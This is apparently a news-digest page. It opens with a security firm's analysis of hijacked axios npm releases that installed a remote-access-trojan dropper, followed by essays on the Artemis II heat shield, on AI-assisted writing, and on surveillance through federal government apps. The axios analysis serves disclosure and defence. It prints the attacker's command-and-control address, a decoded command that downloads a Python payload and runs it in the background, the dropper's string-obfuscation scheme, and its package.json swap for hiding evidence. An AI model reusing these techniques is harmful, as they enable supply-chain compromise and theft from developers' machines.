10 interesting stories served every morning and every evening.
A hijacked maintainer account was used to publish poisoned axios releases, including 1.14.1 and 0.30.4. The attacker injected a hidden dependency that drops a cross-platform RAT. We are actively investigating and will update this post with a full technical analysis. StepSecurity is hosting a community town hall on this incident on April 1st at 10:00 AM PT - Register Here.

axios is the most popular JavaScript HTTP client library, with over 100 million weekly downloads. On March 30, 2026, StepSecurity identified two malicious versions of it published to npm: axios@1.14.1 and axios@0.30.4. There are zero lines of malicious code inside axios itself, and that is exactly what makes this attack so dangerous. Both poisoned releases inject a new dependency, plain-crypto-js@4.2.1, a package never imported anywhere in the axios source, whose sole purpose is to run a postinstall script that acts as a cross-platform remote access trojan (RAT) dropper targeting macOS, Windows, and Linux. The dropper contacts a live command-and-control (C2) server and delivers platform-specific second-stage payloads, then erases itself and replaces its own package.json with a clean decoy to evade forensic detection. A developer who inspects their node_modules folder after the fact will find no indication anything went wrong.

This was not opportunistic. It was precision. The malicious dependency was staged 18 hours in advance. Three payloads were pre-built for three operating systems. Both release branches were poisoned within 39 minutes of each other. Every artifact was designed to self-destruct. Within two seconds of npm install, the malware was already calling home to the attacker's server, before npm had even finished resolving dependencies. This is among the most operationally sophisticated supply chain attacks ever documented against a top-10 npm package.

These compromises were detected by StepSecurity AI Package Analyst [1][2] and StepSecurity Harden-Runner. We have responsibly disclosed the issue to the project maintainers.

StepSecurity Harden-Runner, whose community tier is free for public repositories and is used by over 12,000 of them, detected the compromised axios package making anomalous outbound connections to the attacker's C2 domain across multiple open source projects. For example, Harden-Runner flagged the C2 callback to sfrclak.com:8000 during a routine CI run in the backstage repository, one of the most widely used developer portal frameworks. The Backstage team has confirmed that this workflow is intentionally sandboxed and that the malicious package install does not impact the project. The connection was automatically marked as anomalous because it had never appeared in any prior workflow run. Harden-Runner insights for community-tier projects are public by design, allowing anyone to verify the detection: https://app.stepsecurity.io/github/backstage/backstage/actions/runs/23775668703?tab=network-events
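Detections like this come from comparing each run's egress against a historical baseline. Repositories that want to move from detection to prevention can run Harden-Runner in block mode; a minimal sketch of a workflow step (the version pin and endpoint list here are illustrative, not a recommendation from the analysis):

```yaml
# Sketch: egress filtering in a GitHub Actions job with Harden-Runner.
# Start with egress-policy: audit to learn the baseline, then switch to block.
steps:
  - name: Harden the runner
    uses: step-security/harden-runner@v2
    with:
      egress-policy: block
      allowed-endpoints: >
        registry.npmjs.org:443
        github.com:443
  - uses: actions/checkout@v4
  - run: npm ci   # a postinstall callback to an unlisted C2 host would be blocked here
```

In block mode, a postinstall hook trying to reach sfrclak.com:8000 would fail at the network layer rather than merely being flagged after the fact.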
[Community Webinar] axios Compromised on npm: What We Know, What You Should Do
Join StepSecurity on April 1st at 10:00 AM PT for a live community briefing on the axios supply chain attack. We’ll walk through the full attack chain, indicators of compromise, remediation steps, and open it up for Q&A.
Register for the webinar →
The attack was pre-staged across roughly 18 hours, with the malicious dependency seeded on npm before the axios releases to avoid “brand-new package” alarms from security scanners:
plain-crypto-js@4.2.0 published by nrwise@proton.me — a clean decoy containing a full copy of the legitimate crypto-js source, no postinstall hook. Its sole purpose is to establish npm publishing history so the package does not appear as a zero-history account during later inspection.
plain-crypto-js@4.2.1 published by nrwise@proton.me — malicious payload added. The "postinstall": "node setup.js" hook and obfuscated dropper are introduced.
axios@1.14.1 published by compromised jasonsaayman account (email: ifstap@proton.me) — injects plain-crypto-js@4.2.1 as a runtime dependency, targeting the modern 1.x user base.
axios@0.30.4 published by the same compromised account — identical injection into the legacy 0.x branch, published 39 minutes later to maximize coverage across both release lines.
npm unpublishes axios@1.14.1 and axios@0.30.4. Both versions are removed from the registry and the latest dist-tag reverts to 1.14.0. axios@1.14.1 had been live for approximately 2 hours 53 minutes; axios@0.30.4 for approximately 2 hours 15 minutes. Timestamp is inferred from the axios registry document’s modified field (03:15:30Z) — npm does not expose a dedicated per-version unpublish timestamp in its public API.
npm initiates a security hold on plain-crypto-js, beginning the process of replacing the malicious package with an npm security-holder stub.
npm publishes the security-holder stub plain-crypto-js@0.0.1-security.0 under the npm@npmjs.com account, formally replacing the malicious package on the registry. plain-crypto-js@4.2.1 had been live for approximately 4 hours 27 minutes. Attempting to install any version of plain-crypto-js now returns the security notice.
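For anyone who may have installed axios during the exposure window, the presence of the injected package is the reliable indicator. A minimal check, assuming a standard npm project layout (adjust paths for monorepos or alternate package managers):

```shell
# plain-crypto-js has never been a dependency of any legitimate axios release,
# so any hit below is an indicator of compromise.
grep -H "plain-crypto-js" package.json package-lock.json yarn.lock pnpm-lock.yaml 2>/dev/null

# The installed directory is the stronger signal: the dropper rewrites its own
# package.json to report 4.2.0, so check for presence, not for the version number.
if [ -d node_modules/plain-crypto-js ]; then
  echo "COMPROMISED: the postinstall dropper has already run"
fi
```

If either check hits, treat the machine as compromised rather than simply deleting the directory: by the time node_modules contains the package, the dropper has already called out.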
The attacker compromised the jasonsaayman npm account, the primary maintainer of the axios project. The account's registered email was changed to ifstap@proton.me — an attacker-controlled ProtonMail address. Using this access, the attacker published malicious builds across both the 1.x and 0.x release branches simultaneously, maximizing the number of projects exposed.

Both axios@1.14.1 and axios@0.30.4 are recorded in the npm registry as published by jasonsaayman, making them indistinguishable from legitimate releases at a glance. Both versions were published using the compromised npm credentials of a lead axios maintainer, bypassing the project's normal GitHub Actions CI/CD pipeline.

A critical forensic signal is visible in the npm registry metadata. Every legitimate axios 1.x release is published via GitHub Actions with npm's OIDC Trusted Publisher mechanism, meaning the publish is cryptographically tied to a verified GitHub Actions workflow. axios@1.14.1 breaks that pattern entirely — published manually via a stolen npm access token, with no OIDC binding and no gitHead:

// axios@1.14.0 — LEGITIMATE
"_npmUser": {
  "name": "GitHub Actions",
  "email": "npm-oidc-no-reply@github.com",
  "trustedPublisher": {
    "id": "github",
    "oidcConfigId": "oidc:9061ef30-3132-49f4-b28c-9338d192a1a9"
  }
}

// axios@1.14.1 — MALICIOUS
"_npmUser": {
  "name": "jasonsaayman",
  "email": "ifstap@proton.me"
  // no trustedPublisher, no gitHead, no corresponding GitHub commit or tag
}

There is no commit or tag in the axios GitHub repository that corresponds to 1.14.1. The release exists only on npm. The OIDC token that legitimate releases use is ephemeral and scoped to the specific workflow — it cannot be stolen. The attacker must have obtained a long-lived classic npm access token for the account.

Before publishing the malicious axios versions, the attacker pre-staged plain-crypto-js@4.2.1 from the account nrwise@proton.me. This package:

Masquerades as crypto-js, with an identical description and a repository URL pointing to the legitimate brix/crypto-js GitHub repository

Contains "postinstall": "node setup.js" — the hook that fires the RAT dropper on install

Pre-stages a clean package.json stub in a file named package.md for evidence destruction after execution

The decoy version (4.2.0) was published 18 hours earlier to establish publishing history: a clean package in the registry that makes nrwise look like a legitimate maintainer.

What changed between 4.2.0 (decoy) and 4.2.1 (malicious)

A complete file-level comparison between plain-crypto-js@4.2.0 and plain-crypto-js@4.2.1 reveals exactly three differences. Every other file (all 56 crypto source files, the README, the LICENSE, and the docs) is identical between the two versions.
The 56 crypto source files are not just similar; they are bit-for-bit identical to the corresponding files in the legitimate crypto-js@4.2.0 package published by Evan Vosberg. The attacker made no modifications to the cryptographic library code whatsoever. This was intentional: any diff-based analysis comparing plain-crypto-js against crypto-js would find nothing suspicious in the library files and would focus attention on package.json — where the postinstall hook looks, at a glance, like a standard build or setup task.

The anti-forensics stub (package.md) deserves particular attention. After setup.js runs, it renames package.md to package.json. The stub reports version 4.2.0 — not 4.2.1:

// Contents of package.md (the clean replacement stub)
{
  "name": "plain-crypto-js",
  "version": "4.2.0", // ← reports 4.2.0, not 4.2.1 — deliberate mismatch
  "description": "JavaScript library of crypto standards.",
  "license": "MIT",
  "author": { "name": "Evan Vosberg", "url": "http://github.com/evanvosberg" },
  "homepage": "http://github.com/brix/crypto-js",
  "repository": { "type": "git", "url": "http://github.com/brix/crypto-js.git" },
  "main": "index.js",
  // No "scripts" key — no postinstall, no test
  "dependencies": {}
}

This creates a secondary deception layer. After infection, running npm list in the project directory will report plain-crypto-js@4.2.0 — because npm list reads the version field from the installed package.json, which now says 4.2.0. An incident responder checking installed packages would see a version number that does not match the malicious 4.2.1 version they were told to look for, potentially leading them to conclude the system was not compromised.

# What npm list reports POST-infection (after the package.json swap):
$ npm list plain-crypto-js
myproject@1.0.0
└── plain-crypto-js@4.2.0 # ← reports 4.2.0, not 4.2.1
# but the dropper already ran as 4.2.1
# The reliable check is the DIRECTORY PRESENCE, not the version number:
$ ls node_modules/plain-crypto-js
aes.js cipher-core.js core.js …
# If this directory exists at all, the dropper ran.
# plain-crypto-js is not a dependency of ANY legitimate axios version.

The difference between the real crypto-js@4.2.0 and the malicious plain-crypto-js@4.2.1 is a single field in package.json:

// crypto-js@4.2.0 (LEGITIMATE — Evan Vosberg / brix)
{
  "name": "crypto-js",
  "version": "4.2.0",
  "description": "JavaScript library of crypto standards.",
  "author": "Evan Vosberg",
  "homepage": "http://github.com/brix/crypto-js",
  "scripts": {
    "test": "grunt" // ← no postinstall
  }
}

// plain-crypto-js@4.2.1 (MALICIOUS — nrwise@proton.me)
{
  "name": "plain-crypto-js", // ← different name, everything else cloned
  "version": "4.2.1", // ← version one ahead of the real package
  "description": "JavaScript library of crypto standards.",
  "author": { "name": "Evan Vosberg" }, // ← fraudulent use of real author name
  "homepage": "http://github.com/brix/crypto-js", // ← real repo, wrong package
  "scripts": {
    "test": "grunt",
    "postinstall": "node setup.js" // ← THE ONLY DIFFERENCE. The entire weapon.
  }
}

The attacker published axios@1.14.1 and axios@0.30.4 with plain-crypto-js: "^4.2.1" added as a runtime dependency — a package that has never appeared in any legitimate axios release. The diff is surgical: every other dependency is identical to the prior clean version.

When a developer runs npm install axios@1.14.1, npm resolves the dependency tree and installs plain-crypto-js@4.2.1 automatically. npm then executes plain-crypto-js's postinstall script, launching the dropper.

Phantom dependency: a grep across all 86 files in axios@1.14.1 confirms that plain-crypto-js is never imported or require()'d anywhere in the axios source code. It is added to package.json only to trigger the postinstall hook. A dependency that appears in the manifest but has zero usage in the codebase is a high-confidence indicator of a compromised release.

The Surgical Precision of the Injection

A complete binary diff between axios@1.14.0 and axios@1.14.1 across all 86 files (excluding source maps) reveals that exactly one file changed: package.json. Every other file — all 85 library source files, type definitions, README, CHANGELOG, and compiled dist bundles — is bit-for-bit identical between the two versions.

# File diff: axios@1.14.0 vs axios@1.14.1 (86 files, source maps excluded)
DIFFERS: package.json
Total differing files: 1
Files only in 1.14.1: (none)
Files only in 1.14.0: (none)

# --- axios/package.json (1.14.0)
# +++ axios/package.json (1.14.1)
- "version": "1.14.0",
+ "version": "1.14.1",
  "scripts": {
    "fix": "eslint --fix lib/**/*.js",
-   "prepare": "husky"
  "dependencies": {
    "follow-redirects": "^2.1.0",
    "form-data": "^4.0.1",
    "proxy-from-env": "^2.1.0",
+   "plain-crypto-js": "^4.2.1"
}

Two changes are visible: the version bump (1.14.0 → 1.14.1) and the addition of plain-crypto-js. There is also a third, less obvious change: the "prepare": "husky" script was removed. husky is the git hook manager used by the axios project to enforce pre-commit checks. Its removal from the scripts section is consistent with a manual publish that bypassed the normal development workflow — the attacker edited package.json directly without going through the project's standard release tooling, which would have re-added the husky prepare script.

The same analysis applies to axios@0.30.3 → axios@0.30.4:

# --- axios/package.json (0.30.3)
# +++ axios/package.json (0.30.4)
- "version": "0.30.3",
+ "version": "0.30.4",
  "dependencies": {
    "follow-redirects": "^1.15.4",
    "form-data": "^4.0.4",
    "proxy-from-env": "^1.1.0",
+   "plain-crypto-js": "^4.2.1"
}

Again — exactly one substantive change: the malicious dependency injection. The version bump itself (from 0.30.3 to 0.30.4) is simply the required npm version increment to publish a new release; it carries no functional significance.

setup.js is a single minified file employing a two-layer obfuscation scheme designed to evade static analysis tools and confuse human reviewers.

All sensitive strings — module names, OS identifiers, shell commands, the C2 URL, and file paths — are stored as encoded values in an array named stq[]. Two functions decode them at runtime:

_trans_1(x, r) — XOR cipher. The key "OrDeR_7077" is parsed through JavaScript's Number(): alphabetic characters produce NaN, which in bitwise operations becomes 0. Only the digits 7, 0, 7, 7 in positions 6–9 survive, giving an effective key of [0,0,0,0,0,0,7,0,7,7]. Each character at position r is decoded as: charCode XOR key[(7 × r × r) % 10] XOR 333

_trans_2(x, r) — Outer layer. Reverses the encoded string, replaces _ with =, base64-decodes the result (interpreting the bytes as UTF-8 to recover Unicode code points), then passes the output through _trans_1.

The dropper's entry point is _entry("6202033"), where 6202033 is the C2 URL path segment. The full C2 URL is: http://sfrclak.com:8000/6202033

StepSecurity fully decoded every entry in the stq[] array. The recovered plaintext reveals the complete attack:

stq[0] → "child_process" // shell execution
stq[1] → "os" // platform detection
stq[2] → "fs" // filesystem operations
stq[3] → "http://sfrclak.com:8000/" // C2 base URL
stq[5] → "win32" // Windows platform identifier
stq[6] → "darwin" // macOS platform identifier
stq[12] → "curl -o /tmp/ld.py -d packages.npm.org/product2 -s SCR_LINK && nohup python3 /tmp/ld.py SCR_LINK > /dev/null 2>&1 &"
stq[13] → "package.json" // deleted after execution
stq[14] → "package.md" // clean stub renamed to package.json
stq[15] → ".exe"
stq[16] → ".ps1"
stq[17] → ".vbs"

The complete attack path from npm install to C2 contact and cleanup, across all three target platforms.

With all strings decoded, the dropper's full logic can be reconstructed and annotated. The following is a de-obfuscated, commented version of the _entry() function that constitutes the entire dropper payload. Original variable names are preserved; comments are added for clarity.

// setup.js — de-obfuscated and annotated
// SHA-256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
...
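The two decoding layers described above are easy to verify against the published description. The following is a minimal Node.js reconstruction of the scheme — an illustration based on StepSecurity's analysis, not the attacker's original source; the helper names mirror the report's _trans_1/_trans_2:

```javascript
// Reconstruction of the dropper's string-decoding layers (illustrative).
// The key "OrDeR_7077" is pushed through Number() per character: letters
// become NaN, which bitwise ops treat as 0, leaving [0,0,0,0,0,0,7,0,7,7].
const key = [..."OrDeR_7077"].map((c) => Number(c) | 0);

// _trans_1: per-character XOR — charCode ^ key[(7*r*r) % 10] ^ 333.
// XOR with a fixed key stream is involutive, so this both encodes and decodes.
function trans1(x) {
  let out = "";
  for (let r = 0; r < x.length; r++) {
    out += String.fromCharCode(x.charCodeAt(r) ^ key[(7 * r * r) % 10] ^ 333);
  }
  return out;
}

// _trans_2: outer layer — reverse the string, restore "=" padding (stored
// as "_"), base64-decode as UTF-8, then strip the XOR layer.
function trans2(x) {
  const b64 = [...x].reverse().join("").replace(/_/g, "=");
  return trans1(Buffer.from(b64, "base64").toString("utf8"));
}

// Exact inverse of trans2, used here only to demonstrate the round trip.
function encode(plain) {
  const b64 = Buffer.from(trans1(plain), "utf8").toString("base64");
  return [...b64.replace(/=/g, "_")].reverse().join("");
}
```

Because trans1 is its own inverse, two tiny helpers are enough to hide every sensitive string in the dropper while keeping the minified file small and innocuous-looking to a casual reviewer.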
Read the original on www.stepsecurity.io »
Artemis II Is Not Safe to Fly
“Our test facilities can’t reach the combination of heat flux, pressure, shear stresses, etc., that an actual reentering spacecraft does. We’re always having to wait for the flight test to get the final certification that our system is good to go.”—Jeremy VanderKam, deputy manager for Orion’s heat shield, speaking in 2022
On Wednesday, NASA will attempt to send four astronauts around the moon on a mission called Artemis II. This will be the second flight of NASA’s SLS rocket, and the first time the 20-year-old Orion capsule flies with people on board.
The trouble is that the heat shield on Orion blows chunks. Not in some figurative, pejorative sense, but in the sense that when NASA flew this exact mission in 2022, large pieces of material blew out of Orion’s heat shield during re-entry, leaving divots. Large bolts embedded in the heat shield also partially eroded and melted through.
NASA’s initial instinct was to cover up the problem. In early press releases, they stressed that both rocket and spacecraft had performed exceptionally, while declining to publish the post-flight assessment review. The first mention of heat shield damage came from Orion program manager Howard Hu on a call with reporters in March of 2023. Hu said: “we observed there were more variations across the heat shield than we expected; some of the expected char material that we would expect coming back home ablated away differently than what our computer models and what our ground testing predicted.”
Asked by a journalist to quantify the char loss in a January 2024 phone call, Moon-to-Mars Deputy Administrator Amit Kshatriya said: “it was very small localized areas. Interestingly, it would be much easier for us to analyze if we had larger chunks and it was more defined”. A Lockheed Martin representative on the same call added that “there was a healthy margin remaining of that virgin Avcoat. So it wasn’t like there were large, large chunks.”
It wasn’t until May 2024, when the Office of the Inspector General released photographs of the heat shield, that the extent of the damage became clear. The problem wasn’t char loss or excessive ablation, but deep gouges and holes in many of the Avcoat blocks that comprise the heat shield.
The Avcoat material is not designed to come out in chunks. It is supposed to char and flake off smoothly, maintaining the overall contours of the heat shield. But Orion is a fat and heavy spacecraft, about twice as heavy as the Apollo command module it is modeled after. And the Avcoat heat shield is an experimental design. No one has flown a segmented heat shield like this at lunar return speeds, let alone on a spacecraft this heavy.
The substance of the OIG report was as alarming as the pictures. The OIG identified three issues that could potentially kill the crew on Artemis II:
Heat shield spalling. This is the technical term for all those divots. Since spalling leaves voids and gaps in the heat shield material, it can expose the unprotected body of the capsule and lead to burnthrough. Spalling also changes the pattern of hypersonic airflow around the capsule, creating the potential for localized hot spots and cascading effects.
Impact from heat shield fragments. When spalling sends pieces of heat shield into the hypersonic airstream, they can strike the top of the capsule, damaging the parachute compartment. Whether this happened on Artemis I is unknown. As the OIG report pointed out with some frustration, NASA failed to recover either the parachutes or the parachute cover, despite making elaborate plans to do so. Any evidence of debris impact is now at the bottom of the Pacific Ocean.
Bolt erosion. The OIG report noted erosion and melting in four large separation bolts that sit embedded in the heat shield. These bolts are packed with a heat-resistant material and are supposed to be rugged enough to survive re-entry. But three of the four bolts had melted through, due to a flaw in the heating model NASA had used in designing them. The report further noted: “separation bolt melt beyond the thermal barrier during reentry can expose the vehicle to hot gas ingestion behind the heat shield, exceeding Orion’s structural limits and resulting in the breakup of the vehicle and loss of crew.”
So Orion had come back from the moon with damage severe enough to kill a crew three different ways. Not good!
This left NASA in a quandary. The Orion capsule for Artemis II was already mated to its service module. Taking it off to make changes to the heat shield, even if the agency knew what changes to make, would take years. Nor was there room in the schedule to conduct a flight test, or any spare hardware to conduct the flight test with. Each Orion costs north of a billion dollars, and the only rocket it can launch on (SLS) costs two to four billion dollars a shot, depending on how you do the accounting.
Here it’s worth quoting Admiral Harold Gehman, who chaired the Columbia Accident Investigation Board, on what happens organizationally when a rigid schedule meets an immovable budget:
If a program manager is faced with problems and shortfalls and challenges, if the schedule cannot be extended, he either needs money, or he needs to cut into margin. There were no other options, so guess what the people at NASA did? They started to cut into margins. No one directed them to do this. No one told them to do this. The organization did it, because the individuals in the organization thought they were defending the organization. They thought they were doing what the organization wanted them to do.
And so NASA looked for ways to talk itself into believing it was safe to fly a defective heat shield.
In April 2024, the agency convened an independent review panel. The findings of that panel were not made public, but in December NASA announced that it had found a root cause for the heat shield damage. The Avcoat on the Artemis I heat shield was not sufficiently permeable, and so gas trapped under layers of the material had expanded and blown pieces out of the heat shield. The process had been exacerbated by the re-entry trajectory, which had heating occur in two distinct phases.
This was an awkward finding, since the heat shield NASA would use on Artemis II had been made even less permeable, to make it easier to do ultrasonic testing. But you fly with the heat shield you have, and the agency said it was confident that a change to the re-entry trajectory would be more than adequate to offset any spalling issues.
Somewhat confusingly, they also announced their intention to switch to a new heat shield design, starting with Artemis III. In other words, the Artemis II shield was completely safe to fly, but they were never going to fly it after this mission, and the replacement design would be tested for the first time on a future lunar mission, with astronauts on board.
All of this was kind of preposterous. As the YouTuber Eager Space has pointed out, if a commercial crew capsule (SpaceX Dragon or Boeing Starliner) returned to Earth with the kind of damage seen on Orion, NASA would insist on a redesign and an unmanned test flight to validate it. But the agency does not hold its flagship program to the high standard it demands from commercial crew, even though the same astronaut lives are at stake.
Nor was it lost on observers that the tools and models NASA used to arrive at its new analysis were the same ones that had failed to predict the spalling problem in the first place. While the agency was able to work backwards from flight data to induce flaking in a test coupon of Avcoat, they had no way of predicting how the full-size heat shield would behave in the new flight conditions it would experience on Artemis II.
You don’t have to be a random space blogger to find all this fishy. The most energetic voice of public dissent has been heat shield expert and Shuttle astronaut Charles Camarda, the former Director of Engineering at Johnson Space Center. Aghast at what he saw as a repeat of the motivated reasoning that had led to the loss of Columbia and Challenger, Camarda began making noise both inside and outside the agency, believing that astronauts’ lives were at stake.
In a show of openness, NASA invited Camarda and two journalists to attend a briefing on the heat shield in January of 2026, and gave him limited access to some research materials that have not been made public. But the experience only deepened Camarda’s distress, and he ended up publishing a cri de coeur that I encourage everyone to read in full.
In a nutshell, Camarda argues that NASA is demonstrating the same dysfunction that led to the Columbia and Challenger disasters. Faced with an unexpected engineering failure, it has built toy models to convince itself that the conclusion it wants to reach (it’s safe to fly) is supported by evidence. These toy models are not grounded in physics, but because they appear to be quantitative, they create a false sense of security and understanding, an epistemic fig leaf for management to hide behind.
Put more simply, NASA is going to fly Artemis II based on vibes, hoping that whatever happened to the heat shield on Artemis I won’t get bad enough to harm the crew on Artemis II.
A screen shot from re-entry during Artemis I, showing a large burning fragment of the Orion heat shield
What makes the situation even more frustrating is the fact that, by the program’s own logic, there’s no reason to fly Artemis II with a crew at all.
In the original scheme for Artemis, Artemis II was the only opportunity to fly Orion with astronauts on board before the lunar landing attempt on Artemis III. Artemis III would be a scary mission full of technical firsts (first landing, first use of the lunar lander, first docking in deep space, etc), and it made sense to retire as much technical risk as possible on a dry run around the Moon.
But in early 2026, NASA decided to add an additional Artemis mission to the manifest. The new Artemis III would fly in 2027 as a near-Earth mission to test docking with whatever lunar lander (Blue Origin or SpaceX) was available. The first moon landing would be pushed back to the mission after that, Artemis IV.
This change removed any rationale for flying astronauts on Artemis II. If there are issues with Orion, it is safer for the crew to encounter them in Earth orbit than on a long trip around the Moon. And Artemis II could fly just as easily without astronauts on board, giving ground controllers launch experience and validating (or discrediting) NASA’s heat shield model without endangering a crew. NASA would lose a little face by essentially repeating Artemis I, but doing so would demonstrate that the agency really believes in the safety culture it so often gives lip service to.
Unfortunately, it looks like sunk costs and issues of face will win the day.
The engineers and managers at NASA are not stupid, and they are not cavalier with astronauts’ lives. They’ve read the Rogers Commission and CAIB reports, and many of them remember Challenger and Columbia firsthand. But they exist in a context.
That context is a moon program that has spent close to $100 billion and 25 years with nothing to show for itself, at an agency that has just experienced mass firings and been through a near-death experience with its science budget. The charismatic new Administrator has staked his reputation on increasing launch cadence, and set an explicit goal of landing astronauts on the Moon before President Trump’s term expires in January of 2029.
So people are tying themselves into pretzels to avoid saying the obvious, that the Orion heat shield needs a successful flight test at lunar re-entry speeds to avoid unacceptable risks to the crew.
If the Artemis II crew dies during re-entry, we’ll get another lavishly researched report laying out contributory factors that are plainly visible to anyone following the program right now. The space program will be delayed by years, waiting for investigations to finish and the wrath of Congress to abate. NASA will beat itself up and add more layers of safety bureaucracy, until the same program pressures lead it to make the same mistake again on a future flight.
It’s likely—hopefully very likely—that Artemis II will land safely. But do we really have to wait for astronauts to die to re-learn the same lessons a third time?
Good luck and godspeed to the astronauts on Artemis II.
If you enjoy my writing on space, I invite you to subscribe to my Substack, Mars for the Rest of Us, where I write weekly short essays on topics around Mars exploration.
...
Read the original on idlewords.com »
Don’t Let AI Write For You

When you write a document or essay, you are posing a question and then answering it. For example, a PRD answers the question, “What should we build?” A technical spec answers, “How should we build it?” Sometimes the question is more difficult to answer—“What are we even trying to accomplish?” And with every attempt at answering, you reflect on whether you’re asking the right question.
But now, of course, we have LLMs. I’m seeing an increasing amount of LLM-generated documents, articles, and essays. I want to caution against this. Each LLM-generated document is a missed opportunity to think and build trust.
The goal of writing is not to have written. It is to have increased your understanding, and then the understanding of those around you. When you are tasked to write something, your job is to go into the murkiness and come out of it with structure and understanding. To conquer the unknown.
The second order goal of writing is to become more capable. It is like working out. Every time you do a rep on the boundary of what you can do, you get stronger. It is uncomfortable and effortful.
Letting an LLM write for you is like paying somebody to work out for you.
There are social effects to LLM-generated writing too. When I send somebody a document that whiffs of LLM, I’m only demonstrating that the LLM produced something approximating what others want to hear. I’m not showing that I contended with the ideas.
It undermines my credibility as a person who could lead whatever initiative comes out of this document. That’s unfortunate. I could have used this opportunity to establish credibility.
LLM-generated writing undermines the authenticity of not just one’s writing but of the thinking behind it as well. If the prose is automatically generated, might the ideas be too?
How LLMs can be used in the writing process
LLMs are useful for research and checking your work. They can also work well for quickly recording information or transcribing text (neither of which are what I mean by “writing”, as in “writing an essay”).
They are particularly good at generating ideas. They thrive in this use case because if they generate 10 things and only one is useful, no harm is done. You can take what is useful and leave the rest behind.
LLMs will increase efficiency in delivering software. But in order to make the most of them, we need a simultaneous rise in our level of thoughtfulness.
...
Read the original on alexhwoods.com »
The federal government released an app yesterday, March 27th, and it’s spyware.
The White House app markets itself as a way to get “unparalleled access” to the Trump administration, with press releases, livestreams, and policy updates. The kind of content that every RSS feed on the planet delivers with one permission: network access. But the White House app, version 47.0.1 (because subtlety died a long time ago), requests precise GPS location, biometric fingerprint access, storage modification, the ability to run at startup, draw over other apps, view your Wi-Fi connections, and read badge notifications. It also ships with 3 embedded trackers including Huawei Mobile Services Core (yes, the Chinese company the US government sanctioned, shipping tracking infrastructure inside the sitting president’s official app), and it has an ICE tip line button that redirects straight to ICE’s reporting page.
This thing also has a “Text the President” button that auto-fills your message with “Greatest President Ever!” and then collects your name and phone number. There’s no specific privacy policy for the app, just a generic whitehouse.gov policy that doesn’t address any of the app’s tracking capabilities.
The White House app might actually be one of the milder ones. I’ve been going through every federal agency app I can find on Google Play, pulling their permissions from Exodus Privacy (which audits Android APKs for trackers and permissions), and what I found deserves its own term. I’m calling it Fedware.
Ok so let me walk you through what the federal government is running on your phone.
The FBI’s app, myFBI Dashboard, requests 12 permissions including storage modification, Wi-Fi scanning, account discovery (it can see what accounts are on your device), phone state reading, and auto-start at boot. It also contains 4 trackers, one of which is Google AdMob, which means the FBI’s official app ships with an ad-serving SDK while also reading your phone identity. From what I found, the FBI’s news app has more trackers embedded than most weather apps.
The FEMA app requests 28 permissions including precise and approximate location, and has gone from 4 trackers in older versions down to 1 in v3.0.14. Twenty-eight permissions for an app whose primary function is showing you weather alerts and shelter locations. To put that in context, the AP News app delivers the same kind of disaster coverage with a fraction of the permissions.
IRS2Go has 3 trackers and 10 permissions in its latest version, and according to a TIGTA audit, the IRS released this app to the public before the required Privacy Impact Assessment was even signed, which violated OMB Circular A-130. The app shares device IDs, app activity, and crash logs with third parties, and TIGTA found that the IRS never confirmed that filing status and refund amounts were masked and encrypted in the app interface.
MyTSA comes in lighter with 9 permissions and 1 tracker, but still requests precise and approximate location. The TSA’s own Privacy Impact Assessment says the app stores location locally and claims it never transmits GPS data to TSA. I’ll give them credit for documenting that, because most of these apps have privacy policies that read like ransom notes.
CBP Mobile Passport Control is where things get genuinely alarming. This one requests 14 permissions including 7 classified as “dangerous”: background location tracking (it follows you even when the app is closed), camera access, biometric authentication, and full external storage read/write. And the whole CBP ecosystem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a network that retains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.
The government also built a facial recognition app called Mobile Fortify that ICE agents carry in the field. It draws from hundreds of millions of images across DHS, FBI, and State Department databases. ICE Homeland Security Investigations signed a $9.2 million contract with Clearview AI in September 2025, giving agents access to over 50 billion facial images scraped from the internet. DHS’s own internal documents admit Mobile Fortify can be used to amass biographical information of “individuals regardless of citizenship or immigration status”, and CBP confirmed it will “retain all photographs”, including those of U.S. citizens, for 15 years.
Photos submitted through CBP Home, biometric scans from Mobile Passport Control, and faces captured by Mobile Fortify all feed this system. And the EFF found that ICE does not allow people to opt out of being scanned, and agents can use a facial recognition match to determine your immigration status even when other evidence contradicts it. A U.S.-born citizen was told he could be deported based on a biometric match alone.
SmartLINK is the ICE electronic monitoring app, built by BI Incorporated, a subsidiary of the GEO Group (a private prison company that profits directly from how many people ICE monitors), under a $2.2 billion contract. The app collects geolocation, facial images, voice prints, medical information including pregnancy data, and phone numbers of your contacts. ICE’s contract gives them “unlimited rights to use, dispose of, or disclose” all data collected. The app’s former terms of service allowed sharing “virtually any information collected through the application, even beyond the scope of the monitoring plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these monitors to coordinate one of the largest immigration raids in history, arresting around 700 people across six cities in Mississippi.
And if you think your location data is safe because you use regular apps and avoid government ones, the federal government is buying that data too. Companies like Venntel collect 15 billion location points from over 250 million devices every day through SDKs embedded in over 80,000 apps (weather, navigation, coupons, games). DHS, FBI, DOD, and the DEA purchase this data without warrants, creating a constitutional loophole around the Supreme Court’s 2018 Carpenter v. United States ruling that requires a warrant for cellphone location history. The Defense Department even purchased location data from prayer apps to monitor Muslim communities. Police departments used similar data to track racial justice protesters.
And then there’s the IRS-ICE data sharing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding allowing ICE to receive names, addresses, and tax data for people with removal orders. ICE submitted 1.28 million names. The IRS erroneously shared the data of thousands of people who should never have been included. The acting IRS Commissioner, Melanie Krause, resigned in protest. The chief privacy officer quit. One person leaving changes nothing about the institution, and the data was already out the door. A federal judge blocked further sharing in November 2025, ruling it likely violates IRS confidentiality protections, but by then the IRS was already building an automated system to give ICE bulk access to home addresses with minimal human oversight. The court order is a speed bump, and they’ll find another route.
The apps, the databases, and the data broker contracts all feed the same pipeline, and no single agency controls it because they all share it.
The GAO reported in 2023 that nearly 60% of 236 privacy and security recommendations issued since 2010 had still not been implemented. Congress has been told twice, in 2013 and 2019, to pass comprehensive internet privacy legislation. It has done neither. And it won’t, because the surveillance apparatus serves the people who run it, and the people who run it write the laws. Oversight is theater. The GAO issues a report, Congress holds a hearing, everyone performs concern for the cameras, and then the contracts get renewed and the data keeps flowing. It’s working exactly as designed.
